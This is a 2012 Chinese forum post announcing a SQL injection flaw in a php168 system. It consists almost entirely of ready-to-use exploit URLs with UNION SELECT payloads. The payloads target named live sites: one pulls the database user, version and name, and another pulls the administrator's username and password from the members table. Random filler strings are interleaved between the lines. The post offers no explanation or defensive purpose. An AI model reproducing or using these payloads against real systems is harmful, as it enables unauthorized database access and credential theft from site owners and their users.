找回密码
 立即注册
查看: 3591|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--: u2 W* c% j/ W6 e
                                                         
! K) E; o; Q5 k8 X3 I                                       7 h. M1 |' E. M/ \- p# ?6 L' S
: h) k9 y' ], K7 n7 E' E; y3 e- O
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--% |9 p, y* L% p7 B
                                                     
5 ]( Q( L: `7 a, U8 a5 o                                                                  
  u3 @3 F& ]  d                                                        
, S" O% C+ o6 r) i( K8 A) _5 }- qhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
, t5 `9 _2 G, b1 e: ]. @$ o
% P/ M3 [: R$ ]1 Z3 i# G  }/ ^. F2 T0 n+ B/ S1 e4 `
/ q! {6 J* m0 x) Z8 z3 g
                                                            
1 p: V; w  x$ e2 d, F. ?9 ~0 w
) Y2 _6 e3 |/ \) k: S" yhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--3 w' K# i, e+ ?: S6 v0 V6 C1 O
, h( `1 U% u+ G6 W( {7 `; \

: e* Q2 f' Y: l+ _) [! Z5 z1 ~7 K9 b5 n, C$ P! ]3 C
                                                                    2 O: n& T3 Z) C/ f  Z

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表